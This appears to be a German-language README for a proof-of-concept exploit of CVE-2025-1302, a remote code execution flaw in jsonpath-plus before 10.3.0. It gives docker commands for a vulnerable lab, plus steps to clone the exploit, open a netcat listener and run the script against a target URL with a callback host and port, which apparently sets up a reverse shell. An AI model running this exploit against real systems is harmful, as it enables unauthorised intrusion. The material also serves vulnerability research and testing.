
JSONPath-plus: Remotecodeausführung
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

Versionen des Pakets jsonpath-plus vor 10.3.0 sind aufgrund einer unzureichenden Eingabebereinigung anfällig für Remote Code Execution (RCE). Ein Angreifer kann beliebigen Code auf dem System ausführen, indem er die unsichere Standardverwendung des eval='safe'-Modus ausnutzt. Hinweis: Dies wird durch eine unvollständige Behebung von CVE-2024-21534 verursacht.
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


Dieses Repository ist nicht als RCE-Exploit für CVE-2025-1302 gedacht. Der Zweck dieses Projekts ist es, Menschen dabei zu helfen, mehr über diese Sicherheitslücke zu erfahren und möglicherweise ihre eigenen Anwendungen zu testen.
Wir veröffentlichen einmal im Monat CVE- und Malware-Analysen. Wenn Sie interessiert sind, folgen Sie bitte den untenstehenden Links, um unsere Veröffentlichungen anzusehen. https://www.skshieldus.com/eng/business/insight.do